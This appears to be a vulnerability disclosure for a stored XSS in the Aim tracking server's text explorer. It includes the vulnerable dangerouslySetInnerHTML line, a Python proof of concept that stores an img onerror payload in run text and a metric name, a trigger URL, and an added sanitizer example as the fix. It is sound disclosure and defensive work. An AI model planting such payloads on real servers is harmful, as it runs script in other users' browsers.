credit:Aftersnows
In the textbox.tsx file, React's dangerouslySetInnerHTML is used to display the text in this area, which can lead to an XSS attack.
Analysis shows that dangerouslySetInnerHTML is used in multiple places: not only in the previously reported stored XSS vulnerability, but also within the textbox component.
```tsx
[TEXT_RNDERER_MODES.HTML]: (
  <div dangerouslySetInnerHTML={{ __html: text }} />
),
```
Send this PoC (Proof of Concept) to the target Aim server:

```python
from aim import Run, Text

# Connect to the Aim tracking server
run = Run(repo="aim://127.0.0.1:53800", capture_terminal_logs=False)

# Payload stored as tracked text; the escaped quotes produce alert("Hacked!") in the stored string
poc = "<img onerror='alert(\"Hacked!\");' src='invalid' />"

# Both the text value and the metric name are attacker-controlled
run.track(Text(poc), name=poc, step=1, epoch=1, context={"subset": "train"})
```
Afterwards, by using the HTML text renderer in the TEXT EXPLORER feature, a stored XSS (Cross-Site Scripting) can be triggered.
https://github.com/user-attachments/assets/9b9f5bb9-91ff-410d-8c0b-6b6ac8719828
A user simply needs to access the TEXT EXPLORER query to trigger the XSS attack.
<http://127.0.0.1:43800/text?query=O-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&vis1-c-textRenderer=O-JTdCJTIydHlwZSUyMjolMjJodG1sJTIyJTdE>
This is a standard stored XSS (Cross-Site Scripting) vulnerability. Once triggered by a user, it leads to arbitrary JavaScript running in that user's browser.
TEXT EXPLORER is designed for querying and filtering large amounts of text that meet certain criteria. Imagine a normal user wanting to use the TEXT EXPLORER feature to query the content they need, while an attacker has injected a large number of XSS payloads into it. The attacker can place the PoC in different fields (such as name, title, etc., all of which are under the attacker's control when the data is sent). As a result, the user becomes vulnerable to XSS attacks. The impact of this vulnerability is significant.
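As an added example, not code from this report or from Aim, the following shows the fix on the rendering side: text shown in HTML mode goes through an allowlist sanitizer (so event-handler attributes such as onerror and unsafe URL schemes are removed) and every other mode is escaped. The renderTextBox function and the constant names are hypothetical stand-ins for the textbox component; in a real React component a maintained library such as DOMPurify should be used instead of this hand-rolled sanitizer, which exists only so the example runs offline.

```javascript
// Added example, not Aim's code: an allowlist sanitizer illustrating the fix for
// passing user-controlled text straight into dangerouslySetInnerHTML. In a real
// React component use a maintained library (e.g. DOMPurify.sanitize) instead.
const ALLOWED_TAGS = new Set(["b", "i", "em", "strong", "p", "br", "code", "pre", "a", "img"]);
const ALLOWED_ATTRS = { a: ["href", "title"], img: ["src", "alt", "title"] };

// Escape text so the browser shows it literally instead of parsing it as markup.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only http(s) URLs or scheme-less relative URLs; rejects javascript:, data:, etc.
function safeUrl(value) {
  const v = value.trim();
  if (/^https?:\/\//i.test(v)) return true;
  return !v.startsWith("//") && !v.includes(":");
}

function sanitizeHtml(input) {
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)([^<>]*)>/g;
  let out = "", last = 0, m;
  while ((m = tagRe.exec(input)) !== null) {
    out += escapeHtml(input.slice(last, m.index)); // text between tags
    last = tagRe.lastIndex;
    const [raw, slash, name, attrStr] = m;
    const tag = name.toLowerCase();
    if (!ALLOWED_TAGS.has(tag)) { out += escapeHtml(raw); continue; } // unknown tag shown as text
    if (slash) { out += `</${tag}>`; continue; }
    const kept = [];
    const attrRe = /([a-zA-Z][\w-]*)\s*(?:=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=]+)))?/g;
    let a;
    while ((a = attrRe.exec(attrStr)) !== null) {
      const key = a[1].toLowerCase();
      const val = a[2] ?? a[3] ?? a[4] ?? "";
      if (!(ALLOWED_ATTRS[tag] || []).includes(key)) continue; // drops onerror, onload, style, ...
      if ((key === "href" || key === "src") && !safeUrl(val)) continue;
      kept.push(` ${key}="${escapeHtml(val)}"`);
    }
    out += `<${tag}${kept.join("")}>`;
  }
  return out + escapeHtml(input.slice(last));
}

// Hypothetical stand-in for the textbox renderer: HTML mode is sanitized, any other mode is escaped.
function renderTextBox(text, mode) {
  return mode === "html" ? sanitizeHtml(text) : escapeHtml(text);
}

// Constructed sample with the same shape as the report's payload.
const POC = `<img onerror='alert("Hacked!");' src='invalid' />`;
```

Run against the sample, HTML mode yields `<img src="invalid">` with the onerror handler gone, and text mode yields the payload as inert escaped text.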